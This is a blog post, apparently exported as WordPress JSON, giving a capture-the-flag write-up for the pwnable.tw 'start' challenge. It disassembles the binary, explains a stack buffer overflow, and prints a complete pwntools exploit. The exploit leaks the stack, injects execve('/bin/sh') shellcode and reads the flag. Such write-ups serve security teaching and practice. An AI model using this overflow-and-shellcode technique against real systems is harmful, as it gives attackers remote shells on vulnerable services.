{"id":44,"date":"2021-03-09T21:32:26","date_gmt":"2021-03-09T21:32:26","guid":{"rendered":"https:\/\/blog.bpcspace.com\/?p=44"},"modified":"2021-03-09T21:32:26","modified_gmt":"2021-03-09T21:32:26","slug":"start","status":"publish","type":"post","link":"https:\/\/blog.bpcspace.com\/?p=44","title":{"rendered":"start"},"content":{"rendered":"\n<p>This is the first challenge of pwnable.tw. Fitting its name, it requires some basic knowledge of buffer overflows and x86 assembly.<\/p>\n\n\n\n<p>First, let&#8217;s see what kind of security it has built in:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"563\" height=\"118\" src=\"http:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-3.png\" alt=\"\" class=\"wp-image-48\" srcset=\"https:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-3.png 563w, https:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-3-300x63.png 300w\" sizes=\"auto, (max-width: 563px) 100vw, 563px\" \/><\/figure>\n\n\n\n<p>Notice how the stack is executable, and there are no stack canaries. 
This will come into play later.<\/p>\n\n\n\n<p>We can disassemble the program with <code>objdump -dM intel start<\/code>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>start:     file format elf32-i386\n\nDisassembly of section .text:\n\n08048060 &lt;_start&gt;:\n 8048060:\t54                   \tpush   esp\n 8048061:\t68 9d 80 04 08       \tpush   0x804809d\n 8048066:\t31 c0                \txor    eax,eax\n 8048068:\t31 db                \txor    ebx,ebx\n 804806a:\t31 c9                \txor    ecx,ecx\n 804806c:\t31 d2                \txor    edx,edx\n 804806e:\t68 43 54 46 3a       \tpush   0x3a465443\n 8048073:\t68 74 68 65 20       \tpush   0x20656874\n 8048078:\t68 61 72 74 20       \tpush   0x20747261\n 804807d:\t68 73 20 73 74       \tpush   0x74732073\n 8048082:\t68 4c 65 74 27       \tpush   0x2774654c\n 8048087:\t89 e1                \tmov    ecx,esp\n 8048089:\tb2 14                \tmov    dl,0x14\n 804808b:\tb3 01                \tmov    bl,0x1\n 804808d:\tb0 04                \tmov    al,0x4\n 804808f:\tcd 80                \tint    0x80\n 8048091:\t31 db                \txor    ebx,ebx\n 8048093:\tb2 3c                \tmov    dl,0x3c\n 8048095:\tb0 03                \tmov    al,0x3\n 8048097:\tcd 80                \tint    0x80\n 8048099:\t83 c4 14             \tadd    esp,0x14\n 804809c:\tc3                   \tret    \n\n0804809d &lt;_exit&gt;:\n 804809d:\t5c                   \tpop    esp\n 804809e:\t31 c0                \txor    eax,eax\n 80480a0:\t40                   \tinc    eax\n 80480a1:\tcd 80                \tint    0x80<\/code><\/pre>\n\n\n\n<p>The program first pushes the stack pointer, then the return address (_exit). After that, it pushes 20 bytes and prints them to stdout with the first <code>int 0x80<\/code> (a <code>write<\/code> syscall). dl specifies the number of bytes written, which is exactly 20 (our 5 dwords). The program then reads 63 characters of user input with the second interrupt (a <code>read<\/code> syscall) into that same 20-byte buffer. 
This is where the vulnerability is.<\/p>\n\n\n\n<p>We can overwrite the string previously printed, along with 43 more bytes of stack past it. We can exploit this to overwrite the return address with, you guessed it, the stack pointer. The only issue is we don&#8217;t know where the stack is. While the binary doesn&#8217;t have PIE, where our data resides on the stack will still vary due to things such as environment variables. This binary is way too small and simple to do a ROP chain, so we&#8217;ll have to leak the stack.<\/p>\n\n\n\n<p>If we return to address 0x8048087, the program will print 14 bytes starting from where we are on the stack. That <code>add esp, 0x14<\/code> at the bottom moves our stack pointer past the string previously printed, meaning the first thing it will print is the saved stack pointer. By leaking the stack pointer, we can jump to the stack by overflowing the same prompt a second time.<\/p>\n\n\n\n<p>Putting all these things together, we overflow the return address to leak the stack pointer, calculate offsets from the leak, overflow the same prompt a second time, and return into a stack we control:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#!\/usr\/bin\/env python3\nfrom pwn import *\n\n# just setting things up\ncontext.binary = '.\/start'\nproc = connect('chall.pwnable.tw', 10000)\n\n# we perform our first buffer overflow after it prompts us, returning to 0x8048087 to leak the buffer\nproc.sendafter('CTF:', p32(0xb) * 5 + p32(0x8048087)) # 20 bytes of filler + 4 bytes of return address = 24 bytes\nstack_leak = unpack(proc.recv()&#91;:4]) # stack leak, due to \"push esp\" in first instruction\n\n# This is our payload: the \"\/bin\/sh\" string followed by execve shellcode\npayload = b'\/bin\/sh\\0' # 8 bytes, so the shellcode that follows lands at stack_leak + 28\n# execve(\"\/bin\/sh\", argv, envp) via int 0x80: eax = 11, ebx = path, ecx = argv, edx = envp\npayload += asm('''\n        push 0\n        mov eax, 11\n        mov ebx, {}\n        mov ecx, {}\n        mov edx, {}\n        int 0x80\n        '''.format(stack_leak + 20, stack_leak-60, stack_leak-60))\n\nprint(hex(stack_leak))\n# second overflow: filler, then a return address pointing at our shellcode on the stack, then the payload\nproc.send(p32(0xbbbb) * 5 + p32(stack_leak + 28) + payload)\n\nproc.send('cat \/home\/start\/flag\\n')\nprint(\"The flag is 
\\\"{}\\\"\".format(proc.recv().decode().strip()))<\/code><\/pre>\n\n\n\n<p>The exploit will hand over the flag!<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"565\" height=\"189\" src=\"http:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-4.png\" alt=\"\" class=\"wp-image-50\" srcset=\"https:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-4.png 565w, https:\/\/blog.bpcspace.com\/wp-content\/uploads\/2021\/03\/image-4-300x100.png 300w\" sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>This is the first challenge of pwnable.tw. Fitting its name, it requires some basic knowledge of buffer overflows and x86 assembly. First, let&#8217;s see what kind of security it has built in: Notice how the stack is executable, and there are no stack canaries. This will come into play later. We can disassemble the program [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"templates\/template-full-width.php","format":"standard","meta":{"footnotes":""},"categories":[3,6],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-basic","category-pwnable-tw"],"_links":{"self":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=44"}],"version-history":[{"count":0,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=\/wp\/v2\/posts\
/44\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.bpcspace.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}